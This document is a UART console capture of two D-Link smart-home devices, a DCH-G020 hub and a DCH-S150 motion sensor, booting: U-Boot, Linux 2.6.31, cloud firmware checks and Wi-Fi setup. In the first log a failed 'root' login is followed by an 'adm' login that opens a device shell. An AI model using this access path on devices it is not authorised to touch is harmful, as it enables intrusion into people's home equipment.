athrs27_phy_setup ATHR_PHY_SPEC_STAUS 0 :10
athrs27_phy_setup ATHR_PHY_CONTROL 1 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 1 :10
athrs27_phy_setup ATHR_PHY_CONTROL 2 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 2 :10
athrs27_phy_setup ATHR_PHY_CONTROL 3 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 3 :10
eth1 up
eth0, eth1
Setting 0x181162c0 to 0x1831a100
Hit any key to stop autoboot:  0 
## Booting image at 9F050000 ...
   Image Name:   Linux Kernel Image
   Created:      2016-06-29   9:47:18 UTC
   Image Type:   MIPS Linux Kernel Image (lzma compressed)
   Data Size:    989864 Bytes = 966.7 kB
   Load Address: 80002000
   Entry Point:  8023dd00
   Verifying Checksum at 0x9f050040 ...OK
   Uncompressing Kernel Image ... OK
No initrd
## Transferring control to Linux (at address 8023dd00) ...
## Giving linux memsize in bytes, 67108864

Starting kernel ...

Booting QCA953x
Linux version 2.6.31 (adminuser@adminuser-VirtualBox) (gcc version 4.3.3 (GCC) ) #1 Wed Jun 29 05:43:21 EDT 2016
flash_size passed from bootloader = 16
arg 1: console=ttyS0,115200
arg 2: root=31:6
arg 3: rootfstype=squashfs
arg 4: init=/sbin/init
arg 5: mtdparts=ath-nor0:64k(u-boot),64k(ART),64k(MP),64k(config),64k(bootarg),2048k(uImage),12736k(rootfs1),64k(log),512k(mydlink),512k(data1),128k(data2),64k(data3)
arg 6: mem=64M
CPU revision is: 00019374 (MIPS 24Kc)
ath_sys_frequency: cpu apb ddr apb cpu 550 ddr 400 ahb 200
Determined physical RAM map:
 memory: 02000000 @ 00000000 (usable)
User-defined physical RAM map:
 memory: 04000000 @ 00000000 (usable)
Zone PFN ranges:
  Normal   0x00000000 -> 0x00004000
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
    0: 0x00000000 -> 0x00004000
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 16256
Kernel command line: console=ttyS0,115200 root=31:6 rootfstype=squashfs init=/sbin/init mtdparts=ath-nor0:64k(u-boot),64k(ART),64k(MP),64k(config),64k(bootarg),2048k(uImage),12736k(rootfs1),64k(log),512k(mydlink),512k(data1),128k(data2),64k(data3) mem=64M 
PID hash table entries: 256 (order: 8, 1024 bytes)
Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
Writing ErrCtl register=00000000
Readback ErrCtl register=00000000
Memory: 55732k/65536k available (2303k kernel code, 9728k reserved, 478k data, 120k init, 0k highmem)
NR_IRQS:128
plat_time_init: plat time init done
Calibrating delay loop... 365.56 BogoMIPS (lpj=731136)
Mount-cache hash table entries: 512

****************ALLOC***********************
 Packet mem: 802e84a0 (0x600000 bytes)
********************************************

NET: Registered protocol family 16
bio: create slab <bio-0> at 0
usbcore: registered new interface driver usbfs
usbcore: registered new interface driver hub
usbcore: registered new device driver usb
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 2048 (order: 2, 16384 bytes)
TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
TCP: Hash tables configured (established 2048 bind 2048)
TCP reno registered
NET: Registered protocol family 1
ATH GPIOC major 0
squashfs: version 4.0 (2009/01/31) Phillip Lougher
JFFS2 version 2.2 (NAND) (ZLIB) (RTIME) (c) 2001-2006 Red Hat, Inc.
msgmni has been set to 109
alg: No test for stdrng (krng)
io scheduler noop registered (default)
Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
serial8250.0: ttyS0 at MMIO 0xb8020000 (irq = 19) is a 16550A
console [ttyS0] enabled
loop: module loaded
12 cmdlinepart partitions found on MTD device ath-nor0
Creating 12 MTD partitions on "ath-nor0":
0x000000000000-0x000000010000 : "u-boot"
0x000000010000-0x000000020000 : "ART"
0x000000020000-0x000000030000 : "MP"
0x000000030000-0x000000040000 : "config"
0x000000040000-0x000000050000 : "bootarg"
0x000000050000-0x000000250000 : "uImage"
0x000000250000-0x000000ec0000 : "rootfs1"
0x000000ec0000-0x000000ed0000 : "log"
0x000000ed0000-0x000000f50000 : "mydlink"
0x000000f50000-0x000000fd0000 : "data1"
0x000000fd0000-0x000000ff0000 : "data2"
0x000000ff0000-0x000001000000 : "data3"
usbmon: debugfs is not available
ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
Port Status 1c000004 
ath-ehci ath-ehci.0: ATH EHCI
ath-ehci ath-ehci.0: new USB bus registered, assigned bus number 1
ehci_reset Intialize USB CONTROLLER in host mode: 13
ehci_reset Port Status 1c000000 
ath-ehci ath-ehci.0: irq 3, io mem 0x1b000000
ehci_reset Intialize USB CONTROLLER in host mode: 13
ehci_reset Port Status 1c000000 
ath-ehci ath-ehci.0: USB 2.0 started, EHCI 1.00
usb usb1: New USB device found, idVendor=1d6b, idProduct=0002
usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1
usb usb1: Product: ATH EHCI
usb usb1: Manufacturer: Linux 2.6.31 ehci_hcd
usb usb1: SerialNumber: platform
usb usb1: configuration #1 chosen from 1 choice
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 1 port detected
usbcore: registered new interface driver cdc_acm
cdc_acm: v0.26:USB Abstract Control Model driver for USB modems and ISDN adapters
usbcore: registered new interface driver usbserial
USB Serial support registered for generic
usbcore: registered new interface driver usbserial_generic
usbserial: USB Serial Driver core
USB Serial support registered for cp210x
usbcore: registered new interface driver cp210x
cp210x: v0.09:Silicon Labs CP210x RS232 serial adaptor driver
USB Serial support registered for pl2303
usbcore: registered new interface driver pl2303
pl2303: Prolific PL2303 USB to serial adaptor driver
nf_conntrack version 0.5.0 (1024 buckets, 4096 max)
TCP cubic registered
NET: Registered protocol family 10
IPv6 over IPv4 tunneling driver
NET: Registered protocol family 17
Bridge firewalling registered
RPC: Registered udp transport module.
RPC: Registered tcp transport module.
arch/mips/atheros/gpio.c (ath_simple_config_init) MP_GPIO: 15
arch/mips/atheros/gpio.c (ath_simple_config_init) RESET_BTN_GPIO: 17, RESET_BTN_TRIGGER_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) WPS_BTN_GPIO: 3, WPS_BTN_TRIGGER_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) WPS_LED_GPIO: 11, LED_ACTIVE_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) I2C_SDA_GPIO: 0, INT_I2C_LOW: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) I2C_SCL_GPIO: 1, INT_I2C_LOW: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) POWER_LED_GPIO1: 13, LED_ACTIVE_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) POWER_LED_GPIO2: 14
VFS: Mounted root (squashfs filesystem) readonly on device 31:6.
Freeing unused kernel memory: 120k freed
init started: BusyBox v1.21.1--LSDK-10.2-00082-4 (2016-06-29 05:45:06 EDT)
starting pid 177, tty '': '/etc/rc.d/rcS'
QCA953x Watchdog Timer enabled (30 seconds, nowayout)
<pca9554_config_set|42> i2c_value = 70
<pca9554_config_set|47> i2c_value = 03
<pca9554_config_set|52> i2c_value = 00
<pca9554_output_set|100> i2c_value = 70
<pca9554_output_set|105> i2c_value = 01
<pca9554_output_set|110> i2c_value = ff

vm.panic_on_oom = 1
kernel.panic = 2

Please press Enter to activate this console. Wed Jun 29 00:00:00 UTC 2016
128+0 records in
128+0 records out
[control_center.c] dch mtd found: mtd8
[control_center.c] kernel jffs2 support detected.
[control_center.c] mount /dev/mtdblock8 to /dch.
killall: zw_meter_check: no process killed
killall: zw_center: no process killed
<pca9554_output_set|100> i2c_value = 70
<pca9554_output_set|105> i2c_value = 01
<pca9554_output_set|110> i2c_value = 02
<pca9554_output_set|100> i2c_value = 70

128+0 records in
128+0 records out
<pca9554_output_set|105> i2c_val/dev/watchdog device found. Try to launch watchdog daemon.
ue = 01

usb 1-1: new high speed USB device using ath-ehci and address 2
qca955x_GMAC: Length per segment 1536
953x_GMAC: qca953x_gmac_attach
Link Int Enabled 
qca953x_set_gmac_caps  CHECK DMA STATUS 
mac:0 Registering S27....
qca955x_GMAC: RX TASKLET - Pkts per Intr:18
qca955x_GMAC: unit 0 --> c4:12:f5:1a:58:f4 
<pca9554_output_set|110> i2c_value = 00

qca955x_GMAC: Max segments per packet :   1
qca955x_GMAC: Max tx descriptor count :   512
qca955x_GMAC: Max rx descriptor count :   128
qca955x_GMAC: Mac capability flags    :   2581
953x_GMAC: qca953x_gmac_attach
Link Int Enabled 
qca953x_set_gmac_caps  CHECK DMA STATUS 
mac:1 Registering S27....
qca955x_GMAC: RX TASKLET - Pkts per Intr:18
qca955x_GMAC: unit 1 --> c4:12:f5:1a:58:f4 
qca955x_GMAC: Max segments per packet :   1
qca955x_GMAC: Max tx descriptor count :   512
qca955x_GMAC: Max rx descriptor count :   128
qca955x_GMAC: Mac capability flags    :   2D81
usb 1-1: New USB device found, idVendor=05e3, idProduct=0608
usb 1-1: New USB device strings: Mfr=0, Product=1, SerialNumber=0
usb 1-1: Product: USB2.0 Hub
usb 1-1: configuration #1 chosen from 1 choice
hub 1-1:1.0: USB hub found
hub 1-1:1.0: 4 ports detected
usb 1-1.1: new full speed USB device using ath-ehci and address 3
usb 1-1.1: New USB device found, idVendor=0658, idProduct=0200
usb 1-1.1: New USB device strings: Mfr=0, Product=0, SerialNumber=0
usb 1-1.1: configuration #1 chosen from 1 choice
cdc_acm 1-1.1:1.0: This device cannot do calls on its own. It is not a modem.
cdc_acm 1-1.1:1.0: ttyACM0: USB ACM device
asf: module license 'Proprietary' taints kernel.
Disabling lock debugging due to kernel taint
ath_hal: 0.9.17.1 (AR5416, AR9380, REGOPS_FUNC, WRITE_EEPROM, TX_DATA_SWAP, RX_DATA_SWAP, 11D)
athr_gmac_ring_alloc Allocated 8192 at 0x82c94000
athr_gmac_ring_alloc Allocated 2048 at 0x82c96800
HONEYBEE ----> S27 PHY MDIO
ATHRS27: resetting s27
ATHRS27: s27 reset done
Setting Drop CRC Errors, Pause Frames and Length Error frames 
Setting PHY...
ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved
ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved
enet1 port0 up 100Mbps Full duplex
953x_GMAC: Enet Unit:1 PHY:0 is UP eth1  RGMII  1000Mbps  full duplex
953x_GMAC: done cfg2 0x7215 ifctl 0x0 miictrl  
Setting Drop CRC Errors, Pause Frames and Length Error frames 
Control Center(219) : Recive a request(6) from 0
receive LAN_CABLE_UP_EVENT
ath_ahb: 10.2-00082-4 (Atheros/multi-bss)
__ath_attach: Set global_scn[0]
Enterprise mode: 0x03fc0000
Restoring Cal data from Flash
Green-AP : Green-AP : Attached

ath_get_caps[6148] rx chainmask mismatch actual 3 sc_chainmak 0
ath_get_caps[6123] tx chainmask mismatch actual 3 sc_chainmak 0
ADDRCONF(NETDEV_UP): eth1: link is not ready
ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready
SC Callback Registration for wifi0
wifi0: Atheros ???: mem=0xb8100000, irq=2
ath_pci: 10.2-00082-4 (Atheros/multi-bss)
device eth1 entered promiscuous mode
br0: port 1(eth1) entering learning state
route: resolving dev
Control Center(219) : Recive a request(408) from 287
Application Center(247) : Recive a request(408) from 219
Control Center(219) : Recive a request(414) from 287
br0: port 1(eth1) entering forwarding state
Control Center(219) : Recive a response(408) from 247
Application Center(247) : Recive a request(414) from 219
udhcpc (v1.21.1--LSDK-10.2-00082-4) started
br0       Link encap:Ethernet  HWaddr C4:12:F5:1A:58:F4  
          inet addr:192.168.0.60  Bcast:192.168.0.255  Mask:255.255.255.0
          inet6 addr: fe80::fc31:aaff:fe11:a844/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:398 (398.0 B)

Sending discover...
Failed to kill daemon: No such file or directory
VAP device ath0 created 
ath0
Control Center(219) : Recive a response(414) from 247
Sending select for 192.168.0.251...
Lease of 192.168.0.251 obtained, lease time 3600
deleting routers
route: ioctl 0x890c failed: No such process
adding dns 192.168.0.1
Control Center(219) : Recive a request(9) from 383
<led_center:977>: CMD MATCHED cmd = 9
Application Center(247) : Recive a request(418) from 219
killall: llmnr: no process killed
killall: dlink_time_sync: no process killed
42548 00011.587  194675.0    130.9  88128473355622.3  55343.6         0
killall: send_device_info: no process killed
Control Center(219) : Recive a request(427) from 450
killall: crond: no process killed
Control Center(219) : Recive a request(8) from 383
<led_center:977>: CMD MATCHED cmd = 8
DCHC Center(291) : Recive a request(3021) from 219
Control Center(219) : Recive a response(3021) from 291
Control Center(219) : Recive a response(418) from 247
Application Center(247) : Recive a request(416) from 219
killall: mdns-scan: no process killed
Control Center(219) : Recive a response(416) from 247
Application Center(247) : Recive a request(422) from 219
killall: chkfwd: no process killed
Control Center(219) : Recive a response(422) from 247
Application Center(247) : Recive a request(427) from 219
Control Center(219) : Recive a response(427) from 247
Application Center(247) : Recive a request(426) from 219
[  System Message  ]:Load AesEncrypt By Payload 
killall: dch_scheduler: no process killed
Control Center(219) : Recive a response(426) from 247
Control Center(219) : Recive a request(426) from 450
Application Center(247) : Recive a request(426) from 219
Control Center(219) : Recive a response(426) from 247
[  System Message  ]:Check duplicate launcher = [  ]
[  System Message  ]:Retry to Get Miiicasa Version...
 
 DES SSID SET=DCH-G020-58F4 
 ieee80211_ioctl_siwmode: imr.ifm_active=131712, new mode=3, valid=1 
Interface doesn't accept private ioctl...
ForBiasAuto (8BE0): Operation not permitted
Set freq vap stop send + 83944000
Set freq vap stop send -83944000
rm: can't remove '/tmp/catver': No such file or directory
EXECUTE: wget -O /tmp/catver http://api.dch.dlink.com/agent/upgrade?p=ZgSet wait done --83944000
iDIrwvluRC0zpQr1K%2B84h7GSf96lTMNfBCwQcGtmt4TvYNU9kkzyW9GCaUafmaDRkYw7YQzDERLNOMaAqWhURPdhlpvQt4smuy3%2FucT4ilPrzhgO26zUagIoarwYhl&iv=ei4ns9CIBPN4oVHJ18PHqw%3D%3D in 300 seconds.
--2019-04-15 02:08:06--  http://api.dch.dlink.com/agent/upgrade?p=ZgiDIrwvluRC0zpQr1K%2B84h7GSf96lTMNfBCwQcGtmt4TvYNU9kkzyW9GCaUafmaDRkYw7YQzDERLNOMaAqWhURPdhlpvQt4smuy3%2FucT4ilPrzhgO26zUagIoarwYhl&iv=ei4ns9CIBPN4oVHJ18PHqw%3D%3D
Resolving api.dch.dlink.com... 18.196.6.196, 52.29.105.102
Connecting to api.dch.dlink.com|18.196.6.196|:80... connected.
HTTP request sent, awaiting response... --2019-04-15 02:08:07--  http://127.0.0.1:5459/ws/api/getVersion
Connecting to 127.0.0.1:5459... failed: Connection refused.
200 OK
Length: 310 [text/html]
Saving to: `/tmp/catver'

 0% [                                       ] 0           --.-K/s              100%[======================================>] 310         --.-K/s   in 0s      

2019-04-15 02:08:07 (2.81 MB/s) - `/tmp/catver' saved [310/310]

device ath0 entered promiscuous mode
br0: port 2(ath0) entering learning state
Configuration fi ieee80211_ioctl_siwmode: imr.ifm_active=393856, new mode=3, valid=1 
le: /var/etc/oob_ieee80211_scan_unregister_event_handler: Failed to unregister evhandler=82e4bfc4 arg=83ff0000
.ap_bss
 Scan in progress.. Cancelling it 
br0: port 2(ath0) entering disabled state
 DEVICE IS DOWN ifname=ath0
ath0: Could not  DEVICE IS DOWN ifname=ath0
connect to kernel driver
Using interface ath0 with hwaddr c4:12:f5:1a:58:f4 and ssid 'DCH-G020-58F4'
[zw_center]:ZWave inital success!
Control Center(219) : Recive a request(513) from 344
<led_center:977>: CMD MATCHED cmd = 513
service_event : forward a zwave event to the zwave center(344)!
Remain 299 to kill 565 and restart
{"status":"ok","ver":"1.7.5","url":"http://s3-us-west-2.amazonaws.com/static-us-west.dch.dlink.com/firmware/agent/DCH-G020/D-Link-DCH-G020-1.7.5-AX","md5":"5e0ba8747132524622864a5262a1d50e"} -n
br0: port 2(ath0) entering learning state
V_SerVerStr:1.7.5 V_OriginVer:
[  System Message  ]:Current Miiicasa Version: 1.7.5
[  System Message  ]:Current Miiicasa Frimware Addr: http://s3-us-west-2.amazonaws.com/static-us-west.dch.dlink.com/firmware/agent/DCH-G020/D-Link-DCH-G020-1.7.5-AX
[  System Message  ]:Default Linkd.out Path: /dch/linkd
	grep "version_in_text=$V_OriginVer" $V_LauncherPath
V_LinkdPermanentPath is /dch/linkd.out
md5 check:/dch/linkd.out
V_MD5Miii:        5e0ba8747132524622864a5262a1d50e
V_MD5Local:       5e0ba8747132524622864a5262a1d50e
V_BrandStr:        D-Link
V_ModelStr:        DCH-G020
V_Connectable:     1
V_SerVerStr:       1.7.5
V_SerVerAddr:      http://s3-us-west-2.amazonaws.com/static-us-west.dch.dlink.com/firmware/agent/DCH-G020/D-Link-DCH-G020-1.7.5-AX
V_WgetVerAddr:     http://api.dch.dlink.com/agent/upgrade?brand=D-Link&model=DCH-G020&hardware_version=A1&ver=&md5=57afa002b23b759e4070403c74f1b5cc
V_AesEnAddr:       http://api.dch.dlink.com/agent/upgrade?p=ZgiDIrwvluRC0zpQr1K%2B84h7GSf96lTMNfBCwQcGtmt4TvYNU9kkzyW9GCaUafmaDRkYw7YQzDERLNOMaAqWhURPdhlpvQt4smuy3%2FucT4ilPrzhgO26zUagIoarwYhl&iv=ei4ns9CIBPN4oVHJ18PHqw%3D%3D
V_VerStr:          0.9
V_MiiiHasVersion:  1
--2019-04-15 02:08:09--  http://127.0.0.1:5459/ws/api/getVersion
Connecting to 127.0.0.1:5459... failed: Connection refused.
br0: port 2(ath0) entering forwarding state
mlme_create_infra_bss : Overriding HT40 channel with HT20 channel
--2019-04-15 02:08:11--  http://127.0.0.1:5459/ws/api/getVersion
Connecting to 127.0.0.1:5459... failed: Connection refused.
--2019-04-15 02:08:13--  http://127.0.0.1:5459/ws/api/getVersion
Connecting to 127.0.0.1:5459... failed: Connection refused.
[  System Message  ]:LAUNCHER PID = 481 .............
[  System Message  ]:START LINKD WATCHDOG.............
[  System Message  ]:LINKD &bindStr.............
[  System Message  ]:Linkd.out isn't running ,restarting..........
--2019-04-15 02:08:15--  http://127.0.0.1:5459/ws/api/getVersion
Connecting to 127.0.0.1:5459... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/javascript]
Saving to: `/tmp/getVersion'

    [<=>                                    ] 0           --.-K/s                  [ <=>                                   ] 101         --.-K/s   in 0s      

2019-04-15 02:08:15 (269 KB/s) - `/tmp/getVersion' saved [101]


starting pid 220, tty '/dev/ttyS0': '/bin/login'
DCH-G020 login: root
Password: 
Login incorrect
DCH-G020 login: adm
login: can't change directory to '/adm'


BusyBox v1.21.1--LSDK-10.2-00082-4 (2016-06-29 05:45:06 EDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ $ ls
bin         etc         linuxrc     proc        sys         var         www-ro
dch         etc-ro      lost+found  root        tmp         version
dev         lib         mnt         sbin        usr         www
/ $ a
D-Link® DCH-S150: Home Wi-Fi Motion Sensor
U-Boot 1.1.4--LSDK-10.1.432 (Apr  8 2014 - 17:07:58)

ap143 - Honey Bee 1.1

DRAM:  32 MB
Top of RAM usable for U-Boot at: 82000000
Reserving 134k for U-Boot at: 81fdc000
Reserving 192k for malloc() at: 81fac000
Reserving 44 Bytes for Board Info at: 81fabfd4
Reserving 36 Bytes for Global Data at: 81fabfb0
Reserving 128k for boot params() at: 81f8bfb0
Stack Pointer at: 81f8bf98
Now running in RAM - U-Boot at: 81fdc000
============================================
Date:Apr  8 2014  Time:17:07:58
Loader Version: v1.00 Build:10
Module Name: DCH-S150
============================================
Flash Manuf Id 0xc2, DeviceId0 0x20, DeviceId1 0x17
flash size 8MB, sector count = 128
Flash:  8 MB
* Scan for Linux kernel images ...
* Backup mode Linux kernel found at 9F050000
* Linux kernel found at 9F2B0000
* Scan completed.
!!! 1 Backup mode and 1 other Linux kernel images found.

Using default environment

In:    serial
Out:   serial
Err:   serial
Net:   ath_gmac_enet_initialize...
ath_gmac_enet_initialize: reset mask:c02200
Scorpion ---->S27 PHY*
S27 reg init
: cfg1 0x800c0000 cfg2 0x7114
eth0: c4:12:f5:1c:8e:4c
athrs27_phy_setup ATHR_PHY_CONTROL 4 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 4 :10
eth0 up
Honey Bee ---->  MAC 1 S27 PHY *
S27 reg init
ATHRS27: resetting s27
ATHRS27: s27 reset done
: cfg1 0x800c0000 cfg2 0x7214
eth1: c4:12:f5:1c:8e:4c
athrs27_phy_setup ATHR_PHY_CONTROL 0 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 0 :10
athrs27_phy_setup ATHR_PHY_CONTROL 1 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 1 :10
athrs27_phy_setup ATHR_PHY_CONTROL 2 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 2 :10
athrs27_phy_setup ATHR_PHY_CONTROL 3 :1000
athrs27_phy_setup ATHR_PHY_SPEC_STAUS 3 :10
eth1 up
eth0, eth1
Setting 0x181162c0 to 0x3061a100
Hit any key to stop autoboot:  0
## Booting image at 9f2b0000 ...
   Image Name:   Linux Kernel Image
   Created:      2018-01-03   8:34:42 UTC
   Image Type:   MIPS Linux Kernel Image (lzma compressed)
   Data Size:    832896 Bytes = 813.4 kB
   Load Address: 80002000
   Entry Point:  801dc3a0
   Verifying Checksum at 0x9f2b0040 ...OK
   Uncompressing Kernel Image ... OK
No initrd
## Transferring control to Linux (at address 801dc3a0) ...
## Giving linux memsize in bytes, 33554432

Starting kernel ...

Booting QCA953x
Linux version 2.6.31 (root@minlee-Mint17) (gcc version 4.3.3 (GCC) ) #1 Wed Jan 3 16:27:59 CST 2018
flash_size passed from bootloader = 8
arg 1: console=ttyS0,115200
arg 2: root=31:08
arg 3: rootfstype=squashfs
arg 4: init=/sbin/init
arg 5: mtdparts=ath-nor0:64k(u-boot),64k(ART),64k(MP),64k(config),64k(log),896k(bk_uImage),1536k(bk_rootfs),896k(uImage),4032k(rootfs),2432k@0x50000(bk_firmware),4928k@0x2b0000(firmware),512k@0x780000(mydlink)
arg 6: mem=32M
CPU revision is: 00019374 (MIPS 24Kc)
ath_sys_frequency: cpu apb ddr apb cpu 550 ddr 400 ahb 200
Determined physical RAM map:
 memory: 02000000 @ 00000000 (usable)
User-defined physical RAM map:
 memory: 02000000 @ 00000000 (usable)
Zone PFN ranges:
  Normal   0x00000000 -> 0x00002000
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
    0: 0x00000000 -> 0x00002000
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 8128
Kernel command line: console=ttyS0,115200 root=31:08 rootfstype=squashfs init=/sbin/init mtdparts=ath-nor0:64k(u-boot),64k(ART),64k(MP),64k(config),64k(log),896k(bk_uImage),1536k(bk_rootfs),896k(uImage),4032k(rootfs),2432k@0x50000(bk_firmware),4928k@0x2b0000(firmware),512k@0x780000(mydlink) mem=32M
PID hash table entries: 128 (order: 7, 512 bytes)
Dentry cache hash table entries: 4096 (order: 2, 16384 bytes)
Inode-cache hash table entries: 2048 (order: 1, 8192 bytes)
Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
Writing ErrCtl register=00000000
Readback ErrCtl register=00000000
Memory: 23812k/32768k available (1912k kernel code, 8956k reserved, 396k data, 116k init, 0k highmem)
NR_IRQS:128
plat_time_init: plat time init done
Calibrating delay loop... 365.56 BogoMIPS (lpj=731136)
Mount-cache hash table entries: 512

****************ALLOC***********************
 Packet mem: 80270600 (0x600000 bytes)
********************************************

NET: Registered protocol family 16
bio: create slab <bio-0> at 0
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 1024 (order: 1, 8192 bytes)
TCP bind hash table entries: 1024 (order: 0, 4096 bytes)
TCP: Hash tables configured (established 1024 bind 1024)
TCP reno registered
NET: Registered protocol family 1
ATH GPIOC major 0
squashfs: version 4.0 (2009/01/31) Phillip Lougher
JFFS2 version 2.2 (NAND) (ZLIB) (RTIME) (c) 2001-2006 Red Hat, Inc.
msgmni has been set to 46
alg: No test for stdrng (krng)
io scheduler noop registered (default)
Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
serial8250.0: ttyS0 at MMIO 0xb8020000 (irq = 19) is a 16550A
console [ttyS0] enabled
loop: module loaded
12 cmdlinepart partitions found on MTD device ath-nor0
Creating 12 MTD partitions on "ath-nor0":
0x000000000000-0x000000010000 : "u-boot"
0x000000010000-0x000000020000 : "ART"
0x000000020000-0x000000030000 : "MP"
0x000000030000-0x000000040000 : "config"
0x000000040000-0x000000050000 : "log"
0x000000050000-0x000000130000 : "bk_uImage"
0x000000130000-0x0000002b0000 : "bk_rootfs"
0x0000002b0000-0x000000390000 : "uImage"
0x000000390000-0x000000780000 : "rootfs"
0x000000050000-0x0000002b0000 : "bk_firmware"
0x0000002b0000-0x000000780000 : "firmware"
0x000000780000-0x000000800000 : "mydlink"
nf_conntrack version 0.5.0 (512 buckets, 2048 max)
TCP cubic registered
NET: Registered protocol family 10
IPv6 over IPv4 tunneling driver
NET: Registered protocol family 17
Bridge firewalling registered
arch/mips/atheros/gpio.c (ath_simple_config_init) RESET_BTN_GPIO: 17, RESET_BTN_TRIGGER_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) WPS_BTN_GPIO: 2, WPS_BTN_TRIGGER_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) WPS_LED_GPIO: 3, LED_ACTIVE_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) PIR_GPIO: 1, PIR_TRIGGER_LEVEL: 1
arch/mips/atheros/gpio.c (ath_simple_config_init) POWER_LED_GPIO1: 3, LED_ACTIVE_LEVEL: 0
arch/mips/atheros/gpio.c (ath_simple_config_init) POWER_LED_GPIO2: 4
VFS: Mounted root (squashfs filesystem) readonly on device 31:8.
Freeing unused kernel memory: 116k freed
init started: BusyBox v1.21.1--LSDK-10.1.432 (2018-01-03 16:30:16 CST)
starting pid 135, tty '': '/etc/rc.d/rcS'
QCA953x Watchdog Timer enabled (30 seconds, nowayout)

Please press Enter to activate this console. 128+0 records in
128+0 records out
Wed Jan  3 00:00:00 UTC 2018
[control_center.c] dch mtd found: mtd11
[control_center.c] kernel jffs2 support detected.
[control_center.c] mount /dev/mtdblock11 to /dch.
128+0 records in
128+0 records out
qca955x_GMAC: Length per segment 1536
953x_GMAC: qca953x_gmac_attach
Link Int Enabled
qca953x_set_gmac_caps  CHECK DMA STATUS
mac:0 Registering S27....
qca955x_GMAC: RX TASKLET - Pkts per Intr:18
qca955x_GMAC: unit 0 --> c4:12:f5:1c:8e:4c
asf: module license 'Proprietary' taints kernel.
Disabling lock debugging due to kernel taint
qca955x_GMAC: Max segments per packet :   1
qca955x_GMAC: Max tx descriptor count :   512
qca955x_GMAC: Max rx descriptor count :   128
qca955x_GMAC: Mac capability flags    :   2581
953x_GMAC: qca953x_gmac_attach
Link Int Enabled
qca953x_set_gmac_caps  CHECK DMA STATUS
mac:1 Registering S27....
qca955x_GMAC: RX TASKLET - Pkts per Intr:18
qca955x_GMAC: unit 1 --> c4:12:f5:1c:8e:4c
qca955x_GMAC: Max segments per packet :   1
qca955x_GMAC: Max tx descriptor count :   512
qca955x_GMAC: Max rx descriptor count :   128
qca955x_GMAC: Mac capability flags    :   2D81
ath_hal: 0.9.17.1 (AR5416, AR9380, REGOPS_FUNC, WRITE_EEPROM, 11D)
ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved
ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved
brctl: iface ath1: No such device
athr_gmac_ring_alloc Allocated 8192 at 0x81cb0000
athr_gmac_ring_alloc Allocated 2048 at 0x81f13800
HONEYBEE ----> S27 PHY MDIO
ATHRS27: resetting s27
ATHRS27: s27 reset done
Setting Drop CRC Errors, Pause Frames and Length Error frames
Setting PHY...
/dev/watchdog device found. Try to launch watchdog daemon.
ath_ahb: 10.1.478 (Atheros/multi-bss)
__ath_attach: Set global_scn[0]
Enterprise mode: 0x03fc0000
Restoring Cal data from Flash
Green-AP : Green-AP : Attached

ath_get_caps[5956] rx chainmask mismatch actual 3 sc_chainmak 0
ath_get_caps[5931] tx chainmask mismatch actual 3 sc_chainmak 0
ADDRCONF(NETDEV_UP): eth1: link is not ready
SC Callback Registration for wifi0
wifi0: Atheros ???: mem=0xb8100000, irq=2
Invalid command : setVowExt
VAP device ath1 created
ath1
VAP device ath0 created
ath0

 DES SSID SET=DCH-S150-8E4C
 ieee80211_ioctl_siwmode: imr.ifm_active=131712, new mode=3, valid=1
device ath0 entered promiscuous mode
 ieee80211_ioctl_siwmode: imr.ifm_active=131200, new mode=2, valid=1
device ath1 entered promiscuous mode
Successfully iniieee80211_ioctl_getparam : parameter 0x284 not supported
tialized wpa_supplicant
br0: port 2(ath1) entering learning state
killall: wifi_client_notifier: no process killed
br0: port 2(ath1) entering forwarding state
Control Center(169) : Recive a request(211) from 407
Wireless Center(201) : Recive a request(211) from 169
Control Center(169) : Recive a request(102) from 407
